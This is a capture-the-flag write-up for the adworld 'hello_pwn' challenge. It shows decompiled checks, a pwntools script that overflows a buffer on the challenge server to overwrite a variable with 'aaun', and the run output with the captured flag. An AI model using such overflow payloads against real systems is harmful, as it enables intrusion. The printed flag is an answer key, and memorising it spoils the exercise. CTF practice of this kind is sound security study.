0
点赞
收藏
分享

微信扫一扫

hello_pwn-adworld


hello_pwn-adworld



题目描述:

pwn!,segment fault!菜鸡陷入了深思

题目附件: 下载附件

题目场景:

nc 61.147.171.105 61871

100%

倒计时: 31239

延时删除场景

hello_pwn-adworld_linux

hello_pwn-adworld_ubuntu_02

hello_pwn-adworld_pwn_03

word_60106C == 1853186401

if ( dword_60106C == 0x6E756161 )
sub_400686();

hello_pwn-adworld_ubuntu_04

This point can get segment vault!

if ( dword_60106C == 0x6E756161 )
sub_400686();

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',61871)


pad=4

pause()

#ret_addr=0x0000000000400686
#num
payload=b'A'*pad+'\x61\x61\x75\x6e'

delimiter='for bof'

io.sendlineafter(delimiter,payload)
io.interactive()

#giantbranch@ubuntu:~/Desktop/study$ nc 61.147.171.105 61871  0000000000400686
#~~ welcome to ctf ~~     
#lets get helloworld for bof
#cat flag.txt
#000000000060106C
# if ( dword_60106C == 1853186401 )
#0x6e756161

giantbranch@ubuntu:~/Desktop/study$ python hello_pwn.py
[+] Opening connection to 61.147.171.105 on port 61871: Done
[*] Paused (press any to continue)
[DEBUG] Received 0x36 bytes:
    '~~ welcome to ctf ~~     \n'
    'lets get helloworld for bof\n'
[DEBUG] Sent 0x9 bytes:
    'AAAAaaun\n'
[*] Switching to interactive mode

[DEBUG] Received 0x2d bytes:
    'cyberpeace{05ad515868cb23ffc3b2a6789998d045}\n'
cyberpeace{05ad515868cb23ffc3b2a6789998d045}
[*] Got EOF while reading in interactive
$


举报

相关推荐

adworld-ics-05

CGfsb pwn

BUUCTF Pwn pwn2_sctf_2016

PWN入门分享

1.1.24 musl pwn

0 条评论